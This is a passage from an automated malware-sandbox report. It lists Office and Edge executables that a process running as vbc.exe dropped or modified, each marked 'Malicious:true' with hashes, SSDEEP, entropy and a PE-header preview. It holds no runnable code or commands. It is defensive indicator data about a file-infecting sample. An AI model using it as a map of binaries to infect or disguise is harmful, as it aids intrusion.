                                                                                                                                                                    SHA1:960EABAE4FCF6ED9A5135AB27A50A0A4DAD323E9
                                                                                                                                                                    SHA-256:EADA9C526D86356E5B3E968C8BCE451DF5AF3104DCA99E19F2A70F077DD059EA
                                                                                                                                                                    SHA-512:4D13468CEBA8E977D7F7F53457A03392DF253ABE41C0F26C122E14B0D69EBB9E1490A5223DCA957F0266D36809416109914F6861D376D12D8A269CE46C0FE7D5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....7w$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4993536
                                                                                                                                                                    Entropy (8bit):6.809693913594545
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:hlkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLcRVlbnP9WXW7H6C:XkkCqaE68eV+0ynE6LcHBVH
                                                                                                                                                                    MD5:1A67AA0CE29C84307AC30DF7524455CD
                                                                                                                                                                    SHA1:AC78570F31CF70CF2D410007B2F33B02A8E966EF
                                                                                                                                                                    SHA-256:D4368314B976E466C53B6229E65D8B6AC9366E108F0A7861233DAA913BDD4903
                                                                                                                                                                    SHA-512:09E5BE5722223B9A1160CD89F7DA41DF351C47D58B1D14F81FC74E4E4E74BC882D260459A24FD3D2780CDA7730FECA744C923AB268C8B5C4077F3D1327D8FD4B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL.......L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1168384
                                                                                                                                                                    Entropy (8bit):5.036425509293555
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:CKGVlM41NTnXENcMduaD3aawgPwCnQ3MHv8CI4OJ1bbPHHcFb+KKqCGNpcyop/:CRVldlnXfH9gPwCn7vOb7HHcp/CGXQp
                                                                                                                                                                    MD5:6F2476BA0507172AD45688F83058CCE0
                                                                                                                                                                    SHA1:78D2A928E74F32C6C3AABB1274C9E2E7F80BE204
                                                                                                                                                                    SHA-256:03DEDAF7BDD6F27BB267EA676617B15B98AFD65A22447594FD3D5773F6CC9F2A
                                                                                                                                                                    SHA-512:9AB530906E8A1C76C736D706FCAB42D9B0A92856F7D2B572D995617894F5E23307F278976DD3269BE5A4BA9F692C2C97EE71AF9F80C2D897DD79FFC7BCAEB07B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@.....................................................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1522688
                                                                                                                                                                    Entropy (8bit):5.323792509385658
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:+yAAWSS2H8mRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:+IUM8mRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:37312C05B8CCA110955CAA8CDE1CC850
                                                                                                                                                                    SHA1:7CC534E9DB89E3D8D9F86EE332BE9513BEFEC546
                                                                                                                                                                    SHA-256:3349090B19FA20FE98BC33DB7FD1BB0E7DCB4E33E26646575784A386517B22FB
                                                                                                                                                                    SHA-512:9659F2EB3280C248E6E189CFE6DAE44EBD1944AE66DEB334D8CC028E7791EC1538888A5624BDEA58A7B81A74C4AA4FEEE882D1A6D70AEF0158289B55FC7FC808
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@.................................!...................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1293824
                                                                                                                                                                    Entropy (8bit):5.208221080622871
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:sDpRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:mRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:EC0884FCCB6B8FEB0016A28A3DA07F90
                                                                                                                                                                    SHA1:3B46B79204DA02C1FEA51122F6876D224CEB3536
                                                                                                                                                                    SHA-256:1BF6606CD7B39952773ECCF162F2E57F30DFDA6A1C637688C073E1EE9453DBDB
                                                                                                                                                                    SHA-512:07E948D11C5ED617D743505B0D8DC7DA51EFC2B58354C6D6C8049E730E810D4919DDF8C5F9972EA3942D0BC99B0AC48A4EBB8FAAA4B63B13008898785E0505DC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@..........................................................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...p.......`...^..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1147904
                                                                                                                                                                    Entropy (8bit):5.031767225872832
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:s0TKGVlM41NTnXENcMduaD3aawgPwCnQ3MHv8CI4OJ1bbPHHcFb+KKqCGNpcyop/:LRVldlnXfH9gPwCn7vOb7HHcp/CGXQp
                                                                                                                                                                    MD5:F127162608410574D7451CA54048A5AB
                                                                                                                                                                    SHA1:6C4F15EDC895470A4D282A7A8B03A8BB6C30B865
                                                                                                                                                                    SHA-256:6E488FACEBA08F83A49269BC9843C2AB7A168FB46CE95548FC2225331C62DE3B
                                                                                                                                                                    SHA-512:967125DD46F296619D8D80E3644F8575D0E4E85A8D8CFAC8808773C0A662E3E7DB38FCBC12A1AE3803069F9B6072002E841A37631567788958A52F8654EFB399
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@.................................b........................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc...P.......@...D..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1418752
                                                                                                                                                                    Entropy (8bit):5.390652529519541
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:mAZHHrLZF/FRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:mePZFFRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:29FC1330AB04BC87D4FE7ECB52FDA422
                                                                                                                                                                    SHA1:F39119A05F88807046E8D2B8D833CCA5E46B6718
                                                                                                                                                                    SHA-256:0DBF93CC84D9978F0A701932301C21ACE06799AB9E04E37F390E5B7C136643EB
                                                                                                                                                                    SHA-512:B3D17D9E70A81F7E5C4A197B72A45FCC80FB802DB162F9E2D0EA6643B5D1268E874E7D2271493763CB98B86FBF885F00B655CB8CCD65CF74065E6BF8FEADC669
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@..................................n..........................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...p.......`...F..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):53721600
                                                                                                                                                                    Entropy (8bit):6.543240446686072
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1572864:zNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:zQ9lw68HSq
                                                                                                                                                                    MD5:5FC3D16BE5FE979C92C6F2F627E0B2B2
                                                                                                                                                                    SHA1:A081AB22B96D5E9579B1252126F6F367CD6ED7F7
                                                                                                                                                                    SHA-256:E225BF1AFCF995C9E07A2ED5C4B05543E105541176BE6291C54540770D15C5C7
                                                                                                                                                                    SHA-512:A60B645433364A865225CCDE718614875EC491F751973DB3B24DFACFDE536B0B4143001225CF340E1FD8DEB8D95F70C92FB370D94FB87A8F0B2483483B2C7C5F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9|..8.r.9|..8;r.9|..8.r.9|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5.....~.4.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):40811520
                                                                                                                                                                    Entropy (8bit):6.461354152046433
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:786432:FbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ayMI5aH:FyM8TOtIlPv+msZPH1u5WkID5uceo4qY
                                                                                                                                                                    MD5:13DC1F47AFD3762A1C68F343C12BF590
                                                                                                                                                                    SHA1:2411DD7CE29E074658001F97B4843487626BC130
                                                                                                                                                                    SHA-256:D623649E61EE3FDEEB430C1729D553A6E5D7EA013DACB9F769EB91FA3E7485DB
                                                                                                                                                                    SHA-512:D8B7E735B425D178F10F6AA0760CAA390C2989D763B8AC44A6CD28A6ED25A02282FF4F6D96406C576E31B9BC404DE3C6ABDAFCEC7A1AD3ED6032C8723E6FAA2A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............sI.....q......q......q......q.....Jy.....Jy.....Jy.............q......q......q......q......q%.....M.....q.....Rich....................PE..L......e............... ............h.......`....@...........................o.......o.............................4...^....P..T....`...]>.............................8........................... 5..@............ ..l............................text...P........................... ..`.rdata..8.;.. ....;.................@..@.data....<.......0..................@....detourc.....0......................@..@.c2r....|....P...........................rsrc....]>..`...^>.................@..@.reloc...P....S..@...|S.............@...................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1657344
                                                                                                                                                                    Entropy (8bit):5.6302356734494
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:fE8DMeflpnIOvYUIRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:ftDD9pnIOCRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:ED060808D2831E012B90A99D2928E0CC
                                                                                                                                                                    SHA1:1153F5A3A7B2FA53077BA680285D7FC434A139A6
                                                                                                                                                                    SHA-256:6391062C71239E7E2AAC22B0E73D583466AE1BE157306FB68A710C17B08E093A
                                                                                                                                                                    SHA-512:A46AFD05DB81FEB962DF59E9963BE996AB820D99670425C41CCEC87A1EC060384DAC38EB6A85E40704C40CD8825510F147CA2597565B4C965889C675B9BB82A9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@......................................... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4364800
                                                                                                                                                                    Entropy (8bit):6.746889610910518
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:jHzorVmr2ZkRpdJYol5RVlbnP9WXW7H6C:IiRp7xl5HBVH
                                                                                                                                                                    MD5:54BF989547096F5ECF5FFE703C9BE09F
                                                                                                                                                                    SHA1:C3B0ABD00E503AAABFB1F35A48238265E4A78F2E
                                                                                                                                                                    SHA-256:99580800B5ECBA06F8FF031E455F39AA75C58AF7331A1A7DB259CAEC3126ED32
                                                                                                                                                                    SHA-512:446699795D91ED71A16ECAC1D3D7EB3404BE62C4B5159A927EC5AF1D4F8CD010A54C8807BEB5627A7E43860D411E8B649D25EE1181C193BC8F1AE53C6B53D9ED
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......C... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1238528
                                                                                                                                                                    Entropy (8bit):5.139881155630218
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:hEyTSRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:GymRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:70A1CF267F63DBFF49302547FEB246D6
                                                                                                                                                                    SHA1:98C57C1645B14C0D336B211E2EC540B1637024B6
                                                                                                                                                                    SHA-256:22C0DFBDA0E0E08419550CC093EE4933EABD6321C970929C5CB7490DBA7B9803
                                                                                                                                                                    SHA-512:7E6AA011237EA939DF6E63AAA45EF234E45FCA822DBFEDA6E4FE02643CD882DB4BFCA7C2E7EE8F12E115D170A506359A80D89DED6F77C3C993479A1AA241ECC1
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P............ ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2354176
                                                                                                                                                                    Entropy (8bit):7.049993709502122
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:chDdVrQ95RW0YEHyWQXE/09Val0GHDmg27RnWGj:chHYW+HyWKMD527BWG
                                                                                                                                                                    MD5:D2EAE0B17D8ED7CE90F29615B714FC9B
                                                                                                                                                                    SHA1:2473D69492CBF264D9FAF7FEC3615437185B50BF
                                                                                                                                                                    SHA-256:1561C66499E719E475C17B802513F83D7AC71E07014CC4742083C10CF7DD195C
                                                                                                                                                                    SHA-512:B1D483A5D9DC35BC342B5691CD78660514B546DF35871A8A2764954198F05055F47C10455853959DA665A39CD41C5E968E426FFAD630A2B5389BCA02AAC517EC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.....d.$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1825280
                                                                                                                                                                    Entropy (8bit):7.155296395967679
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:80EzQSyRPRoc1XRVlbnXf9gPTTW7H1GXC:7jRPRTRVlbnP9WXW7H6C
                                                                                                                                                                    MD5:6DACCC8E081640B3D66D374B55531892
                                                                                                                                                                    SHA1:700E0F6F1BFDE1B7D1FF84BBCBE7301A79AB3E7F
                                                                                                                                                                    SHA-256:7530FEEE2DB54C12CFAC7C713B2594EF85E53B2007C7F410E85F4CD0E6CF779D
                                                                                                                                                                    SHA-512:41098C93356C99B300B235FCE364CCB10F73619162551022E13C54A9F384F7EFB6F104D53EB4D45C648BE1DADFCE362FAC4E9D47833CA88C9460CBCF5C9897BE
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0......vK.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                    Entropy (8bit):7.1422350184334285
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:qD2VmAyiwIb8boQ7RVlbnXf9gPTTW7H1GXC:a2V7wIbyRVlbnP9WXW7H6C
                                                                                                                                                                    MD5:275436DDF0002857653D4F4DEDC8EB4E
                                                                                                                                                                    SHA1:50F66AED8711CF3A146350BB2839D5BA78ECC1B6
                                                                                                                                                                    SHA-256:1527D06A5BC860F2A517C1B2B760E7864925C46AED7287075C72C985283815EF
                                                                                                                                                                    SHA-512:D50472BC7F33FB3BADCEE14C6BA9EBF53ADAA75EE178BAF9A36A2FBF2175821C98C48B2C2DA81546FDBC9FC06A3916C928DD21135B5D5FE00A3E70AF7B35D227
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2853376
                                                                                                                                                                    Entropy (8bit):6.948665349881427
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:ZfD3zO9ZhBGloizM3HRNr00TRVlbnXf9gPTTW7H1GXC:NDaalxzM00TRVlbnP9WXW7H6C
                                                                                                                                                                    MD5:5CE615DD5B30E969B9907ED6FDAC132D
                                                                                                                                                                    SHA1:227752FEC8AC78F656CE4272E3D64B974FD290A9
                                                                                                                                                                    SHA-256:713A530E31B69D16E51433CE725B943E841F1FC8E522DC2A3E46C17231FD20DC
                                                                                                                                                                    SHA-512:7571B6F30E831FE8B23493AAFCCA8DE5E965DD3C3EA5CBB7B01079A5DBDFF92D8248EE29E0A135F4F82B260A2B2DC2BEF7E77A94ED154CE0825D6FFF47DDB60A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-......J,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4320256
                                                                                                                                                                    Entropy (8bit):6.823109886706186
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:FI72LvkrDpbxJRoIMLRVlbnP9WXW7H6C:FI7nbihHBVH
                                                                                                                                                                    MD5:0FBDAB6DAC4FA1B63D521DF1414E4133
                                                                                                                                                                    SHA1:B32DABDB05A491CD6B3AC34879A5A3688138B735
                                                                                                                                                                    SHA-256:BAE57D15E9522253EC3B942CC4660C0BC21B9585033EF726F530391BD2A99A8B
                                                                                                                                                                    SHA-512:803776223D566A1D9627CDF7E86BE5EACEB22284320F5DDE7F7368DEFCBC6FAA2E6BB37636224FA2AE571D42213052F1573B7D6AC9B5D79A626F7180DB212B64
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.....=*B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
